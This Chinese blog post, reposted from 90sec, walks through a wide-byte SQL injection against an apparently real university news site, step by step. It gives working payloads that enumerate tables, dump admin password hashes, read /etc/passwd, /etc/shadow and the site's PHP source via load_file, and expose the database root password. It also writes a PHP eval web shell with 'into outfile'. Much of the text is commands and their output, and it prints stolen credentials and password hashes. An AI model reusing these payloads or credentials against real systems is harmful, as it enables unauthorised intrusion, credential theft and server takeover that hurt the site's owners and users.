一次宽字符注入渗透过程 |

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

站点:http://xxxx.xxxx.edu.cn

注入点:http://xxxxx.xxxxx.edu.cn/news_view.php?id=94

提交 %bf’ 出现错误,由此可见存在宽字节注入

接着 %bf%27 and1=1 %23 正确返回

%bf%27 order by 10 %23

返回正确 判断当前页面字段数当前页面字段数为10

接着渗透

%bf%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10%23

返回正确 返回3 9

用database() 爆出 数据库名字为 international

直接爆表

   先用dual表判断了一下 information.schema.tables 是否可用

   判断结果 成功返回3 9,这样判断information_schema.table

   可用。

   接着用 table_name 替代3 同时在后边加上查询条件 where TABLE_NAME=

  0x696E7465726E6174696F6E616C international的十六进制

   返回表名 i_admin 初步判断为 管理员账号所在的表

    通过limit 条件

   接着爆表

  i_admin

  i_application_configs

  i_application_information_step1

  i_application_information_step2

  i_application_information_step3

  i_application_userbasic

  i_count

  i_department

   。。。下面就不爆了

   接着爆 i_admin 的 字段

   1,2,3,4,5,6,7,8,9,10 frominformation_schema.COLUMNS

   正确返回数字

  i_admin 十六进制0x695F61646D696E

   加上 where 条件 后  返回 字段 uid

   接着加limit条件 爆出所有的字段

    uid

    m_id

    username

    password

    name

    state

  至此 i_admin 的字段名全部爆出。

  接着爆 username 和password 这两个

  问题出现了 换成 username 和password 返回错误??而uid和state没错误

Hex编码解决问题

Hex(username)

6A73    js

Hex(password)

63316661363261616xxxxxxxxxxxx64323062383732666663366531303936

c1fa62aaeb049f62d20b872ffc6e1096

rxxxxxxx7

rxxxxxxx7

61646D696E  admin

65313832613535xxxxxxxxxxxx36662626138316166636564343631

jxxxxxxxx2

7A687A

30343938303530xxxxxxxxxxxxxx466353730346337643336656438

jsxxxxxxxxxxx2

到此拿下后台密码

————————————————-

换一种思路

   因为 是 root权限 ..到这了。。

load_file(0x2F6574632F706173737764) //读/etc/passwd文件

返回

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/bin/bash

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

news:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

rpm:x:37:37::/var/lib/rpm:/sbin/nologin

dbus:x:81:81:System message

bus:/:/sbin/nologin a

vahi:x:70:70:Avahi

daemon:/:/sbin/nologin

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

nscd:x:28:28:NSCD

Daemon:/:/sbin/nologin

vcsa:x:69:69:virtual

console memory owner:/dev:/sbin/nologin

rpc:x:32:32:Portmapper

RPC user:/:/sbin/nologin

rpcuser:x:29:29:RPC Service

User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:65534:65534:Anonymous NFS

User:/var/lib/nfs:/sbin/nologin

sshd:x:74:74:Privilege-separated

SSH:/var/empty/sshd:/sbin/nologin

pcap:x:77:77::/var/arpwatch:/sbin/nologin

haldaemon:x:68:68:HALdaemon:/:/sbin/nologin

xfs:x:43:43:X Font

Server:/etc/X11/fs:/sbin/nologin

mysql:x:500:500::/home/mysql:/bin/bash

apache:x:48:48:Apache:/var/www:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

zf_job:x:501:501::/opt/www_application/job:/bin/bash

angang523409:x:502:0::/home/angang523409:/bin/bash

syyy:x:503:503::/opt/www_application/syyy:/bin/bash

网站所在目录

读:/opt/www_application/xxxxx/news_view.php

0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F6E6577735F766965772E706870

replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F6E6577735F766965772E706870),char(60),char(32))

?php include_once(‘global.php’); if(isset($_GET[id])){$sql=”update i_newsbase set hits=hits+1 where id=”.$_GET[id];mysql_query($sql); $query_view = mysql_query(“SELECT * FROM `i_newsbase`WHERE `id`=’$_GET[id]’;”); $row_view = mysql_fetch_array($query_view); }?> !DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN””http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”> htmlxmlns=”http://www.w3.org/1999/xhtml”> head> metahttp-equiv=”Content-Type” content=”text/html; charset=GB2312″/> title> ?=$row_view[title]?> – ?=$row_arr[websitename]?> /title> ?php include_once(‘header.php’);?> !–contene–> div id=”contene_”> divid=”box_l”> div id=”box_r”> divid=”l_box”> div> div>h3>Focus News /h3> /div> ?php $query_news = mysql_query(“SELECT *FROM `i_newsbase` order by `date_time` desc limit 12 “); while($row_news =mysql_fetch_array($query_news)){ ?> p> span> atitle=” ?=$row_news[title]?>” href=”news_view.php?id=?=$row_news[id]?>”> ?php if(strlen($row_news[title])>40) { echo$db->titlesubstr($row_news[title],0,40).”…” ;} else echo$row_news[title]; ?> /a> /span> /p> ?php } ?> /p> /div>/div> /div> /div> div id=”box_l_”> divid=”box_r_”> div id=”r_box”> div>h3> a href=”index.php”>Home /a> span>» /span> a href=”news_list.php”>News /a>/h3> /div> div> div>?php $query_all = mysql_query(“SELECT * FROM `i_newsbase` as`a`,`i_newscontent` as `b` where `a`.`id`=`b`.`nid` and `a`.`id`=’$_GET[id]’limit 1;”); $row_all = mysql_fetch_array($query_all); ?> divalign=”center” > ?=$row_all[title]?> /div> p> /p> pclass=”font” align=”center”>Date:?=date(“Y-m-d”,$row_all[date_time])?> /p> /div> ?=$row_all[content]?>/div> div> /div> /div> /div> /div>div> /div> div id=”ad”> /div>/div> ?php include_once(‘footer.php’); ?>

接着读取

Global.php

/opt/www_application/xxxxx/global.php

0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F676C6F62616C2E706870

replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F676C6F62616C2E706870),char(60),char(32))

返回

?php include_once (‘./configs/config.php’);include_once (‘./common/mysql.class.php’); include_once(‘./common/action.class.php’); include_once (‘./common/page.class.php’); $db =new action($mydbhost, $mydbuser, $mydbpw, $mydbname, ALL_PS, $mydbcharset);$query_config=$db->query(“SELECT * FROM `i_config`”); while($row_config=$db->fetch_array($query_config)){$row_arr[$row_config[name]]=$row_config[values];$row_eng[$row_config[name]]=$row_config[xxxxx_values]; } ?>

读 ./configs/config.php

/opt/www_application/xxxxx/configs/config.php

/opt/www_application/configs/config.php

0x2F6F70742F7777775F6170706C69636174696F6E2F636F6E666967732F636F6E6669672E706870

replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F636F6E666967732F636F6E6669672E706870),char(60),char(32))

返回空。。。。。。。。无此文件

/opt/www_application/xxxxx/configs/config.php

0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F636F6E6669672E706870

replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F636F6E6669672E706870),char(60),char(32))

返回:

?php include_once(‘db_config.php’);include_once(‘variable_config.php’);/****************************************************************************** 上传图片的参数说明:$max_file_size : 上传文件大小限制, 单位BYTE $destination_folder : 上传文件路径 $watermark : 是否附加水印(1为加水印,其他为不加水印); 使用说明: 1. 将PHP.INI文件里面的”extension=php_gd2.dll”一行前面的;号去掉,因为我们要用到GD库; 2. 将extension_dir =改为你的php_gd2.dll所在目录; ******************************************************************************/// 上传文件类型列表$uptypes=array( ‘image/jpg’, ‘image/jpeg’, ‘image/png’, ‘image/pjpeg’,’image/gif’, ‘image/bmp’, ‘image/x-png’ ); $max_file_size=2000000; //上传文件大小限制, 单位BYTE$destination_folder=”uploading/”; //上传文件路径 $watermark=1; //是否附加水印(1为加水印,其他为不加水印); $watertype=1; //水印类型(1为文字,2为图片)$waterposition=1; //水印位置(1为左下角,2为右下角,3为左上角,4为右上角,5为居中); $waterstring=”TY”;//水印字符串$waterimg=”xplore.gif”; //水印图片 $imgpreview=1; //是否生成预览图(1为生成,其他为不生成); $imgpreviewsize=1/1; //缩略图比例 ?>

/opt/www_application/xxxxx/configs/db_config.php

0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F64625F636F6E6669672E706870

replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F64625F636F6E6669672E706870),char(60),char(32))

返回

x

?php // 该文件为存储用户数据库的变量的文件 $mydbhost = “localhost”; $mydbuser = “root”;$mydbpw = “xyw1120”; $mydbname = “international”;$mydbcharset = “GBK”; ?>

目的达到:mysql 账号 root ,密码 xyw1120

/opt/www_application/xxxxx/1.php

select “dddd” into outfile’/var/www/data/suddytest.php’

select ‘<?php eval($_POST[cmd])?>’into outfile ‘D:/PHPnow-1.5.4/htdocs/index2.php’
select ‘<?php  echo “HelloWorld”; ?>’  into outfile ‘/opt/www_application/xxxxx/index2.php’

757365726E616D65

/etc/vpn/server.conf

0x2F6574632F76706E2F736572766572 E636F6E66

replace(load_file(0x2F6574632F76706E2F736572766572E636F6E66),char(60),char(32))

replace(load_file(0x2F6574632F76706E2F736572766572E636F6E66),char(60),char(32))

扫一下端口

   80   Open

  111   Open

  1723  Open

  3306  Open

1723 vpn端口,从这个角度出发。。。。。接着渗透

读 /etc/shadow
0x2F6574632F736861646F77

replace(load_file(0x2F6574632F736861646F77),char(60),char(32))

内容如下

root:$1$PqDYAJMy$nrwxVO7zGgQsd.cNfzOSp0:14731:0:99999:7:::bin:$1$v/3WmY2W$jUw9sPr2kDkW0BvNB63gO.:14847:0:99999:7:::daemon:*:14215:0:99999:7::: adm:*:14215:0:99999:7::: lp:*:14215:0:99999:7:::sync:*:14215:0:99999:7::: shutdown:*:14215:0:99999:7::: halt:*:14215:0:99999:7:::mail:*:14215:0:99999:7::: news:*:14215:0:99999:7::: uucp:*:14215:0:99999:7:::operator:*:14215:0:99999:7::: games:*:14215:0:99999:7:::gopher:*:14215:0:99999:7::: ftp:*:14215:0:99999:7:::nobody:*:14215:0:99999:7::: rpm:!!:14215:0:99999:7::: dbus:!!:14215:0:99999:7:::avahi:!!:14215:0:99999:7::: mailnull:!!:14215:0:99999:7:::smmsp:!!:14215:0:99999:7::: nscd:!!:14215:0:99999:7:::vcsa:!!:14215:0:99999:7::: rpc:!!:14215:0:99999:7:::rpcuser:!!:14215:0:99999:7::: nfsnobody:!!:14215:0:99999:7::: sshd:!!:14215:0:99999:7:::pcap:!!:14215:0:99999:7::: haldaemon:!!:14215:0:99999:7:::xfs:!!:14215:0:99999:7::: mysql:!!:14218:0:99999:7::: apache:!!:14221::::::ntp:!!:14545:::::: zf_job:$1$.EE7dw2F$/G1ObIx0vfXZsZ/DBid/z0:14728:0:99999:7:::angang523409:$1$vA29oCDp$FJo378ewOAgvfu0c7tjwD0:14747:0:99999:7:::syyy:$1$38W/v5/Z$L5K9oIAdaFHH8js6fODFL/:15265:0:99999:7:::

 

转自:90sec

Tags:

宽字符注入漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
一次宽字符注入渗透过程 |